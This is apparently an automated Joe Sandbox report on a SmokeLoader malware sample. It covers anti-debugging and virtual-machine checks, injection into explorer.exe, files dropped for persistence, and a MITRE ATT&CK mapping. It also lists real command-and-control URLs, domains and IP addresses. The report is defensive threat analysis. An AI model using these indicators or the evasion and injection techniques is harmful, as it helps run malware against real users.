            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\somiho64\zujejitude\fay.pdb source: 1E3.exe, 1E3.exe, 0000000A.00000000.534315442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 1E3.exe, 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 1E3.exe.6.dr
            Source: Binary string: C:\vopuwonove\puracol.pdb source: file.exe, vgfsabt.6.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004020AC pushad ; ret 1_2_004020AD
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402DB9 push esi; ret 1_2_00402DCF
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00532113 pushad ; ret 1_2_00532114
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00532E20 push esi; ret 1_2_00532E36
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_004048C1 push ecx; ret 9_2_004048D4
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_004048C1 push ecx; ret 10_2_004048D4
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_004028BE LoadLibraryA,GetProcAddress,9_2_004028BE
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vgfsabtJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vgfsabtJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1E3.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vgfsabt:Zone.Identifier read attributes | deleteJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\explorer.exe TID: 2396Thread sleep count: 656 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 260Thread sleep count: 313 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 260Thread sleep time: -31300s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 2880Thread sleep count: 319 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 2880Thread sleep time: -31900s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\vgfsabtEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_9-6262
            Source: C:\Users\user\AppData\Roaming\vgfsabtEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_9-6515
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-6514
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_10-6261
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 656Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vgfsabtAPI coverage: 7.0 %
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeAPI coverage: 7.0 %
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\vgfsabtAPI call chain: ExitProcess graph end nodegraph_9-6517
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeAPI call chain: ExitProcess graph end nodegraph_10-6515
            Source: explorer.exe, 00000006.00000000.385060326.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000006.00000000.414139848.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
            Source: explorer.exe, 00000006.00000000.414139848.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.406831856.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.414139848.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000006.00000000.385060326.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_00405EC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00405EC0
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_004028BE LoadLibraryA,GetProcAddress,9_2_004028BE
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0053092B mov eax, dword ptr fs:[00000030h]1_2_0053092B
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00530D90 mov eax, dword ptr fs:[00000030h]1_2_00530D90
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_004039D2 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004039D2
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_00406E1E SetUnhandledExceptionFilter,9_2_00406E1E
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_00405EC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00405EC0
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040472E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040472E
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_004039D2 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004039D2
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_00406E1E SetUnhandledExceptionFilter,10_2_00406E1E
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_00405EC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00405EC0
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_0040472E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040472E

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeFile created: vgfsabt.6.drJump to dropped file
            Source: C:\Windows\explorer.exeDomain query: vatra.at
            Source: C:\Windows\explorer.exeDomain query: degroeneuitzender.nl
            Source: C:\Windows\explorer.exeNetwork Connect: 181.215.246.89 80Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 28F19E0Jump to behavior
            Source: explorer.exe, 00000006.00000000.380032746.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.445021113.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.385271841.00000000086B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.405365268.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.427508489.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.374969941.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
            Source: explorer.exe, 00000006.00000000.405365268.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.427508489.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.374969941.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.405365268.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.427508489.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.374969941.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.404982920.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.374755637.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.426700719.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: GetLocaleInfoA,9_2_0040D99F
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: GetLocaleInfoA,10_2_0040D99F
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_00407430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_00407430

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.3.file.exe.540000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.file.exe.530e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.3.file.exe.540000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.file.exe.530e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            32
            Process Injection
            11
            Masquerading
            1
            Input Capture
            1
            System Time Discovery
            Remote Services1
            Input Capture
            Exfiltration Over Other Network Medium11
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts2
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            12
            Virtualization/Sandbox Evasion
            LSASS Memory221
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Exploitation for Client Execution
            Logon Script (Windows)Logon Script (Windows)32
            Process Injection
            Security Account Manager12
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Hidden Files and Directories
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer114
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Software Packing
            Cached Domain Credentials14
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            File Deletion
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 777186 Sample: file.exe Startdate: 03/01/2023 Architecture: WINDOWS Score: 100 27 vatra.at 2->27 37 Snort IDS alert for network traffic 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Yara detected SmokeLoader 2->41 43 2 other signatures 2->43 8 file.exe 2->8         started        11 vgfsabt 2->11         started        signatures3 process4 signatures5 45 Detected unpacking (changes PE section rights) 8->45 47 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->47 49 Maps a DLL or memory area into another process 8->49 53 2 other signatures 8->53 13 explorer.exe 4 8->13 injected 51 Machine Learning detection for dropped file 11->51 process6 dnsIp7 29 175.120.254.9, 49709, 49719, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 13->29 31 93.112.238.85, 49715, 80 SAUDINETSTC-ASSA Saudi Arabia 13->31 33 6 other IPs or domains 13->33 21 C:\Users\user\AppData\Roaming\vgfsabt, PE32 13->21 dropped 23 C:\Users\user\AppData\Local\Temp\1E3.exe, PE32 13->23 dropped 25 C:\Users\user\...\vgfsabt:Zone.Identifier, ASCII 13->25 dropped 55 System process connects to network (likely due to code injection or exploit) 13->55 57 Benign windows process drops PE files 13->57 59 Deletes itself after installation 13->59 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->61 18 1E3.exe 13->18         started        file8 signatures9 process10 signatures11 35 Machine Learning detection for dropped file 18->35

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\1E3.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\vgfsabt100%Joe Sandbox ML
            SourceDetectionScannerLabelLinkDownload
            1.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.file.exe.530e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.3.file.exe.540000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            SourceDetectionScannerLabelLink
            vatra.at1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://degroeneuitzender.nl/systems/index.php0%URL Reputationsafe
            http://cracker.biz/tmp/0%URL Reputationsafe
            http://skinndia.com/tmp/0%URL Reputationsafe
            http://vatra.at/tmp/0%URL Reputationsafe
            http://schemas.microsoft.coyyL0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            degroeneuitzender.nl
            5.135.247.111
            truetrue
              unknown
              vatra.at
              195.158.3.162
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              https://degroeneuitzender.nl/systems/index.phpfalse
              • URL Reputation: safe
              unknown
              http://cracker.biz/tmp/true
              • URL Reputation: safe
              unknown
              http://skinndia.com/tmp/true
              • URL Reputation: safe
              unknown
              http://vatra.at/tmp/true
              • URL Reputation: safe
              unknown
              http://piratia-life.ru/tmp/false
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000000.405148588.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.427104048.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.374860423.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://schemas.microsoft.coyyLexplorer.exe, 00000006.00000000.417080410.000000000EBD2000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  93.112.238.85
                  unknownSaudi Arabia
                  25019SAUDINETSTC-ASSAtrue
                  5.135.247.111
                  degroeneuitzender.nlFrance
                  16276OVHFRtrue
                  195.158.3.162
                  vatra.atUzbekistan
                  8193BRM-ASUZtrue
                  211.171.233.126
                  unknownKorea Republic of
                  3786LGDACOMLGDACOMCorporationKRfalse
                  181.215.246.89
                  unknownChile
                  60458ASN-XTUDIONETEStrue
                  190.140.74.43
                  unknownPanama
                  18809CableOndaPAfalse
                  175.120.254.9
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRtrue
                  58.235.189.192
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRfalse
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:777186
                  Start date and time:2023-01-03 09:44:09 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 19s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:file.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@4/3@13/8
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 75% (good quality ratio 66.8%)
                  • Quality average: 70.4%
                  • Quality standard deviation: 34.1%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 31
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                  • Not all processes where analyzed, report is missing behavior information
                  TimeTypeDescription
                  09:46:26Task SchedulerRun new task: Firefox Default Browser Agent 55CE28A7D25DA4BB path: C:\Users\user\AppData\Roaming\vgfsabt
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  93.112.238.85file.exeGet hashmaliciousBrowse
                  • vatra.at/tmp/
                  file.exeGet hashmaliciousBrowse
                  • vatra.at/tmp/
                  file.exeGet hashmaliciousBrowse
                  • vatra.at/tmp/
                  5.135.247.111file.exeGet hashmaliciousBrowse
                    file.exeGet hashmaliciousBrowse
                      file.exeGet hashmaliciousBrowse
                        file.exeGet hashmaliciousBrowse
                          file.exeGet hashmaliciousBrowse
                            file.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                file.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      L9wmLVWpWK.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          degroeneuitzender.nlfile.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          L9wmLVWpWK.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          vatra.atfile.exeGet hashmaliciousBrowse
                                                          • 211.119.84.112
                                                          file.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          file.exeGet hashmaliciousBrowse
                                                          • 211.119.84.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 175.119.10.231
                                                          file.exeGet hashmaliciousBrowse
                                                          • 123.140.161.243
                                                          file.exeGet hashmaliciousBrowse
                                                          • 175.126.109.15
                                                          file.exeGet hashmaliciousBrowse
                                                          • 175.119.10.231
                                                          file.exeGet hashmaliciousBrowse
                                                          • 211.53.230.67
                                                          file.exeGet hashmaliciousBrowse
                                                          • 175.119.10.231
                                                          file.exeGet hashmaliciousBrowse
                                                          • 109.102.255.230
                                                          file.exeGet hashmaliciousBrowse
                                                          • 175.119.10.231
                                                          file.exeGet hashmaliciousBrowse
                                                          • 123.140.161.243
                                                          file.exeGet hashmaliciousBrowse
                                                          • 123.140.161.243
                                                          file.exeGet hashmaliciousBrowse
                                                          • 151.251.24.5
                                                          L9wmLVWpWK.exeGet hashmaliciousBrowse
                                                          • 181.94.48.228
                                                          file.exeGet hashmaliciousBrowse
                                                          • 123.140.161.243
                                                          file.exeGet hashmaliciousBrowse
                                                          • 84.224.172.131
                                                          file.exeGet hashmaliciousBrowse
                                                          • 190.219.54.242
                                                          file.exeGet hashmaliciousBrowse
                                                          • 211.119.84.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 175.126.109.15
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          SAUDINETSTC-ASSAfile.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          file.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          file.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          file.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          file.exeGet hashmaliciousBrowse
                                                          • 2.88.92.23
                                                          file.exeGet hashmaliciousBrowse
                                                          • 2.88.92.23
                                                          file.exeGet hashmaliciousBrowse
                                                          • 2.88.92.23
                                                          file.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          file.exeGet hashmaliciousBrowse
                                                          • 2.91.189.255
                                                          file.exeGet hashmaliciousBrowse
                                                          • 2.91.189.255
                                                          file.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.55.82.192
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.49.114.140
                                                          file.exeGet hashmaliciousBrowse
                                                          • 93.112.238.85
                                                          sSB5yHCWJg.elfGet hashmaliciousBrowse
                                                          • 94.98.191.253
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.163.180.22
                                                          file.exeGet hashmaliciousBrowse
                                                          • 188.55.103.27
                                                          file.exeGet hashmaliciousBrowse
                                                          • 2.88.127.152
                                                          rad6um18Mh.elfGet hashmaliciousBrowse
                                                          • 94.98.191.226
                                                          80000.dllGet hashmaliciousBrowse
                                                          • 37.56.111.49
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          GsixVTA6hs.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          L9wmLVWpWK.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          frJ0A6bu3o.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          file.exeGet hashmaliciousBrowse
                                                          • 5.135.247.111
                                                          No context
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):650752
                                                          Entropy (8bit):7.459319971555059
                                                          Encrypted:false
